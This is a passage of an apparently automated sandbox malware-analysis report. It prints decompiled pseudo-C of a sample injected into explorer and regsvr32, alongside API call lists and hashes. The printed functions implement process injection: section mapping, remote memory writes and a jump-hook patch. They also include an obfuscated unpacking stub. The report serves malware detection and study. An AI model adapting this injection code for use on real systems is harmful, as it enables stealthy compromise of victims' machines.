                            				char _v24;
                            				char _v28;
                            				void* _t12;
                            				intOrPtr _t14;
                            				void* _t15;
                            				intOrPtr _t16;
                            				void* _t17;
                            				void* _t19;
                            				void* _t20;
                            				char _t24;
                            				intOrPtr _t26;
                            				intOrPtr _t28;
                            				intOrPtr _t33;
                            				intOrPtr _t38;
                            				intOrPtr _t40;
                            				void* _t41;
                            				intOrPtr _t46;
                            				void* _t48;
                            				intOrPtr _t51;
                            				void* _t61;
                            				void* _t71;
                            
                            				_t71 = __fp0;
                            				_t38 =  *0x9e6f4; // 0x1d4
                            				_t12 = E0008A4BF(_t38, 0);
                            				while(_t12 < 0) {
                            					E0008980C( &_v28);
                            					_t40 =  *0x9e700; // 0x0
                            					_t14 =  *0x9e704; // 0x0
                            					_t41 = _t40 + 0x3840;
                            					asm("adc eax, ebx");
                            					__eflags = _t14 - _v24;
                            					if(__eflags > 0) {
                            						L13:
                            						_t15 = 0;
                            					} else {
                            						if(__eflags < 0) {
                            							L4:
                            							_t16 =  *0x9e684; // 0x286f8f0
                            							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                            							__eflags = _t17;
                            							if(_t17 == 0) {
                            								break;
                            							} else {
                            								_t33 =  *0x9e684; // 0x286f8f0
                            								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                            								_t51 =  *0x9e6f4; // 0x1d4
                            								__eflags = 0;
                            								_t12 = E0008A4BF(_t51, 0);
                            								continue;
                            							}
                            						} else {
                            							__eflags = _t41 - _v28;
                            							if(_t41 >= _v28) {
                            								goto L13;
                            							} else {
                            								goto L4;
                            							}
                            						}
                            					}
                            					L12:
                            					return _t15;
                            				}
                            				E0008980C(0x9e700);
                            				_t19 = GetCurrentProcess();
                            				_t20 = GetCurrentThread();
                            				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_t24 =  *0x9e6e8; // 0x286ffa8
                            				_v28 = _t24;
                            				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                            				if(_t61 >= 0) {
                            					_push(0);
                            					_push( *0x9e760);
                            					_t48 = 0x27;
                            					E00089F06(_t48);
                            				}
                            				if(_v24 != 0) {
                            					E00086890( &_v24);
                            				}
                            				_t26 =  *0x9e684; // 0x286f8f0
                            				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                            				_t28 =  *0x9e758; // 0x0
                            				 *0x9e6ec = 0;
                            				_t29 =  !=  ? 1 : _t28;
                            				_t46 =  *0x9e6f4; // 0x1d4
                            				 *0x9e758 =  !=  ? 1 : _t28;
                            				E0008A4DB(_t46);
                            				_t15 = _t61;
                            				goto L12;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                            • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                            • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                            • DuplicateHandle.KERNEL32 ref: 00081BD9
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Current$Process$DuplicateHandleThread
                            • String ID:
                            • API String ID: 3566409357-0
                            • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                            • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                            • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Executed Functions

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E1000C6C0(void* __ecx, intOrPtr __edx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				long _v24;
                            				long _v28;
                            				void* _v32;
                            				intOrPtr _v36;
                            				long _v40;
                            				void* _v44;
                            				char _v56;
                            				char _v72;
                            				struct _WNDCLASSEXA _v120;
                            				void* _t69;
                            				intOrPtr _t75;
                            				struct HWND__* _t106;
                            				intOrPtr* _t113;
                            				struct _EXCEPTION_RECORD _t116;
                            				void* _t126;
                            				void* _t131;
                            				intOrPtr _t134;
                            				void* _t140;
                            				void* _t141;
                            
                            				_t69 =  *0x1001e688; // 0x1930590
                            				_t126 = __ecx;
                            				_t134 = __edx;
                            				_t116 = 0;
                            				_v36 = __edx;
                            				_v16 = 0;
                            				_v44 = 0;
                            				_v40 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v24 = 0;
                            				_v20 = __ecx;
                            				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                            					E1000E23E(0x1f4);
                            					_t116 = 0;
                            				}
                            				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                            				_v28 = _t116;
                            				if( *_t113 != 0x4550) {
                            					L12:
                            					if(_v8 != 0) {
                            						_t75 =  *0x1001e780; // 0x19afbc8
                            						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                            						_v8 = _v8 & 0x00000000;
                            					}
                            					L14:
                            					if(_v12 != 0) {
                            						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                            					}
                            					if(_v16 != 0) {
                            						NtClose(_v16);
                            					}
                            					return _v8;
                            				}
                            				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                            				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                            					goto L12;
                            				}
                            				_v120.style = 0xb;
                            				_v120.cbSize = 0x30;
                            				_v120.lpszClassName =  &_v56;
                            				asm("movsd");
                            				_v120.lpfnWndProc = DefWindowProcA;
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsb");
                            				asm("movsd");
                            				asm("movsd");
                            				asm("movsw");
                            				asm("movsb");
                            				_v120.cbWndExtra = 0;
                            				_v120.lpszMenuName = 0;
                            				_v120.cbClsExtra = 0;
                            				_v120.hInstance = 0;
                            				if(RegisterClassExA( &_v120) != 0) {
                            					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                            					if(_t106 != 0) {
                            						DestroyWindow(_t106); // executed
                            						UnregisterClassA( &_v56, 0);
                            					}
                            				}
                            				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                            					_t126 = _v20;
                            					goto L12;
                            				} else {
                            					_t126 = _v20;
                            					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                            						goto L12;
                            					}
                            					_t140 = E10008669( *0x1001e688, 0x1ac4);
                            					_v32 = _t140;
                            					if(_t140 == 0) {
                            						goto L12;
                            					}
                            					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                            					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                            					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                            					E1000861A( &_v32, 0x1ac4);
                            					_t141 =  *0x1001e688; // 0x1930590
                            					 *0x1001e688 = _t131;
                            					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                            					E1000C63F(_v12, _v8, _v36);
                            					 *0x1001e688 = _t141;
                            					goto L14;
                            				}
                            			}

                            APIs
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                            • RegisterClassExA.USER32 ref: 1000C785
                            • CreateWindowExA.USER32 ref: 1000C7B0
                            • DestroyWindow.USER32 ref: 1000C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                            • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                            • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                            • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                            • NtClose.NTDLL(00000000), ref: 1000C8F5
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 2002808388-2319545179
                            • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                            • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 93%
                            			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                            				long _v8;
                            				long _v12;
                            				void* _v16;
                            				intOrPtr _v23;
                            				void _v24;
                            				long _v28;
                            				void* _v568;
                            				void _v744;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				struct HINSTANCE__* _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t35;
                            				void* _t39;
                            				intOrPtr _t43;
                            				void* _t63;
                            				long _t65;
                            				void* _t70;
                            				void** _t73;
                            				void* _t74;
                            
                            				_t73 = __edx;
                            				_t63 = __ecx;
                            				_t74 = 0;
                            				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                            					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                            					_t74 = _t39;
                            					if(_t74 != 0) {
                            						memset( &_v744, 0, 0x2cc);
                            						_v744 = 0x10002;
                            						_push( &_v744);
                            						_t43 =  *0x1001e684; // 0x19afaa0
                            						_push(_t73[1]);
                            						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                            							_t70 = _v568;
                            							_v12 = _v12 & 0x00000000;
                            							_v24 = 0xe9;
                            							_t65 = 5;
                            							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                            							_v8 = _t65;
                            							_v16 = _t70;
                            							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                            								L6:
                            								_t74 = 0;
                            							} else {
                            								_v28 = _v28 & 0x00000000;
                            								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                            									goto L6;
                            								}
                            							}
                            						}
                            					}
                            				}
                            				_t32 =  *0x1001e77c; // 0x0
                            				if(_t32 != 0) {
                            					FreeLibrary(_t32);
                            					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                            				}
                            				_t33 =  *0x1001e784; // 0x0
                            				if(_t33 != 0) {
                            					_t35 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                            					E1000861A(0x1001e784, 0xfffffffe);
                            				}
                            				return _t74;
                            			}

                            APIs
                              • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                              • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                              • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                              • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                              • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                              • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                              • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • memset.MSVCRT ref: 1000CBB8
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                            • String ID:
                            • API String ID: 317994034-0
                            • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                            • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                            • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                            • Instruction ID: 8c7fc7b48dea3e45d6787360bd4698ee3818bb00c4bce2742e13cf2d58b18be6
                            • Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                            • Instruction Fuzzy Hash: D8427B72D00609DFEF04DFA4C9897AA7BB5FF64311F1850AADD0DAE149C73815A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNEL32(00782C25,00782C25,458F0000,?,00000000), ref: 007831F1
                            • OleUninitialize.OLE32(00782C25), ref: 00783354
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: LibraryLoadUninitialize
                            • String ID:
                            • API String ID: 2978721001-0
                            • Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                            • Instruction ID: 5dbd3396b844fd462bcce41fc5092cd745ddfb62420d73db0d0bc2c36c14ce98
                            • Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                            • Instruction Fuzzy Hash: 68D16972C00618DFEF04DFA4C9897AABBB5FF54311F08546ADD0DAE149C73816A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 50%
                            			E00781424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
                            				void* _t154;
                            				int _t155;
                            				signed int _t158;
                            				int _t159;
                            				signed int _t160;
                            				intOrPtr _t163;
                            				signed int _t164;
                            				signed int _t166;
                            				signed int _t169;
                            				signed int _t171;
                            				intOrPtr _t175;
                            				signed int _t176;
                            				intOrPtr _t177;
                            				signed int _t179;
                            				signed int _t182;
                            				signed int _t183;
                            				signed int _t185;
                            				signed int _t188;
                            				signed int _t189;
                            				signed int _t190;
                            				void* _t192;
                            				signed int _t193;
                            				signed int _t194;
                            				signed int _t212;
                            				signed int _t215;
                            				signed int _t224;
                            				signed int _t225;
                            				void* _t226;
                            				void* _t227;
                            				signed int _t234;
                            				signed int _t237;
                            				void* _t244;
                            				signed int* _t246;
                            
                            				_t234 = __esi;
                            				_t224 = __edi;
                            				_t212 = __edx;
                            				_t155 = E0078463B(_t154, __ebx, __ecx, __edi);
                            				_push(__ecx);
                            				_t188 = __ebx | __ebx;
                            				_t185 = _t188;
                            				_pop(_t189);
                            				if(_t188 != 0) {
                            					if( *(_t185 + 0x4358a4) == 0) {
                            						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
                            						 *_t246 = _t189;
                            						 *(_t185 + 0x4358a4) = 0 ^ _t183;
                            						_t189 = 0;
                            					}
                            					_push(4);
                            					_push(0x1000);
                            					_push( *((intOrPtr*)(_t185 + 0x435280)));
                            					_push(0);
                            					if( *(_t185 + 0x435585) == 0) {
                            						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
                            						 *(_t244 - 8) = _t212;
                            						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
                            						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
                            						_t212 =  *(_t244 - 8);
                            					}
                            					_t155 = VirtualAlloc();
                            				}
                            				 *_t17 = _t155;
                            				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
                            				if( *(_t185 + 0x435014) == 0) {
                            					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
                            					 *(_t244 - 4) = _t224;
                            					 *(_t185 + 0x435014) = 0 ^ _t179;
                            					_t224 =  *(_t244 - 4);
                            					_t155 = (_t179 & 0x00000000) +  *_t246;
                            					_t246 =  &(_t246[1]);
                            				}
                            				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
                            				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
                            				_t237 = _t234;
                            				if( *(_t185 + 0x4350b0) > 0) {
                            					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
                            						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
                            						 *(_t244 - 8) = _t237;
                            						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
                            						_t237 =  *(_t244 - 8);
                            					}
                            					_push(_t185 + 0x4354d2);
                            					_push(0x40);
                            					if( *(_t185 + 0x435968) == 0) {
                            						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
                            						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
                            						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
                            						_t189 = _t189;
                            					}
                            					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
                            					 *_t246 = _t189;
                            					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
                            					_t189 = 0;
                            					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
                            				}
                            				if(_t155 != _t185) {
                            					if( *(_t185 + 0x435366) == 0) {
                            						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
                            						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
                            						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
                            						_t224 = _t224;
                            					}
                            					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                            					_push( *((intOrPtr*)(_t185 + 0x435288)));
                            					if( *(_t185 + 0x435248) == 0) {
                            						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
                            						 *(_t244 - 8) = _t212;
                            						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
                            						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
                            						_t212 =  *(_t244 - 8);
                            					}
                            					_t155 = E00783726(_t185, _t189, _t212, _t224, _t237); // executed
                            				}
                            				 *(_t244 - 4) = _t212;
                            				_t190 = 0 ^  *(_t185 + 0x435462);
                            				_t215 =  *(_t244 - 4);
                            				 *(_t244 - 8) = _t155;
                            				_t225 = 0 ^  *(_t185 + 0x4350b0);
                            				_t158 =  *(_t244 - 8);
                            				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
                            					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
                            					 *_t79 = _t158;
                            					_push( *(_t244 - 8));
                            					_pop( *_t81);
                            					 *_t82 = _t190;
                            					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
                            				}
                            				_t192 = _t225 | _t225;
                            				_t226 = _t192;
                            				_t193 = _t190;
                            				if(_t192 != 0) {
                            					if( *(_t185 + 0x435520) == 0) {
                            						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
                            						 *(_t244 - 8) = _t193;
                            						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
                            						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
                            						_t193 =  *_t246;
                            						_t246 =  &(_t246[1]);
                            					}
                            					_push(_t226);
                            					if( *(_t185 + 0x4353c6) == 0) {
                            						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
                            						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
                            						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
                            						_t237 = _t237;
                            						_t193 = (_t193 & 0x00000000) +  *_t246;
                            						_t246 = _t246 - 0xfffffffc;
                            					}
                            					_t158 = E00784495(_t158, _t185, _t193, _t215, _t226, _t237);
                            				}
                            				 *_t246 =  *_t246 ^ _t158;
                            				_t159 = _t158;
                            				if( *(_t185 + 0x435855) == 0) {
                            					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
                            					 *(_t244 - 8) = _t226;
                            					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
                            					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
                            					_t226 =  *(_t244 - 8);
                            					_pop( *_t113);
                            					_t193 =  *(_t244 - 8);
                            					 *_t115 = _t193;
                            					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
                            				}
                            				_t160 = memset(_t226, _t159, _t193 << 0);
                            				_t227 = _t226 + _t193;
                            				_t194 = 0;
                            				if( *(_t185 + 0x4353ce) == 0) {
                            					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
                            					 *(_t244 - 4) = _t215;
                            					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
                            					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
                            					_t215 =  *(_t244 - 4);
                            				}
                            				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
                            					if( *(_t185 + 0x4357d6) == 0) {
                            						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
                            						 *(_t244 - 8) = _t237;
                            						 *(_t185 + 0x4357d6) = 0 ^ _t164;
                            						_t237 =  *(_t244 - 8);
                            					}
                            					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                            					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
                            						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
                            						 *(_t244 - 8) = _t194;
                            						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
                            						_t194 =  *(_t244 - 8);
                            					}
                            					_t161 = E0078242A(_t185, _t194, _t215, _t227, _t237); // executed
                            					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
                            						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
                            						 *_t146 =  *(_t244 - 4);
                            					}
                            					_t160 = E00783658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
                            				}
                            				 *(_t244 - 8) = _t194;
                            				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
                            				 *_t153 =  *(_t244 - 4);
                            				asm("popad");
                            				return _t160;
                            			}

                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 007814AB
                            • VirtualProtect.KERNEL32(?), ref: 007815B1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: Virtual$AllocProtect
                            • String ID:
                            • API String ID: 2447062925-0
                            • Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                            • Instruction ID: 16df22f572c5d7ff66d55aedf72c7645a118d9fbe60e2095afe0be5d86713f4e
                            • Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                            • Instruction Fuzzy Hash: 5EC16E72940604EFFF14DFA0C889B597BB5FF24311F1860A9ED0D9E19AD77815A4CB28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • OleUninitialize.OLE32(00782C25), ref: 00783354
                            • OleInitialize.OLE32(00000000,00000000), ref: 0078349A
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: InitializeUninitialize
                            • String ID:
                            • API String ID: 3442037557-0
                            • Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                            • Instruction ID: 8740d3ed38995ecab2828f4b51065ca9482b4e9796c215d29b2a3b57ddf8e504
                            • Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                            • Instruction Fuzzy Hash: E8519A72D04619DFEF14DFA4C8897AABBB1FF14311F08516ADD4DAE189C7380690CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E00783726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                            				char _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t416;
                            				signed int _t417;
                            				signed int _t421;
                            				void* _t425;
                            				signed int _t427;
                            				signed int _t429;
                            				signed int _t434;
                            				signed int _t436;
                            				signed int _t438;
                            				signed int _t440;
                            				signed int _t441;
                            				signed int _t443;
                            				signed int _t446;
                            				signed int _t450;
                            				signed int _t451;
                            				signed int _t453;
                            				signed int _t454;
                            				signed int _t455;
                            				intOrPtr _t457;
                            				signed int _t459;
                            				signed int _t461;
                            				signed int _t462;
                            				signed int _t465;
                            				signed int _t466;
                            				signed int _t468;
                            				signed int _t469;
                            				signed int _t471;
                            				signed int _t473;
                            				signed int _t476;
                            				signed int _t477;
                            				signed int _t478;
                            				signed int _t480;
                            				signed int _t481;
                            				signed int _t486;
                            				signed int _t489;
                            				void* _t493;
                            				void* _t495;
                            				signed int _t497;
                            				signed int _t500;
                            				void* _t503;
                            				signed int _t504;
                            				signed int _t507;
                            				signed int _t509;
                            				signed int _t512;
                            				signed int _t514;
                            				signed int _t515;
                            				signed int _t520;
                            				signed int _t525;
                            				int _t527;
                            				int _t531;
                            				void* _t567;
                            				signed int _t568;
                            				signed int _t570;
                            				signed int _t584;
                            				signed int _t585;
                            				signed int _t587;
                            				void* _t590;
                            				void* _t592;
                            				void* _t625;
                            				intOrPtr* _t626;
                            				signed int _t627;
                            				void* _t629;
                            				signed int _t634;
                            				signed int _t637;
                            				signed int _t639;
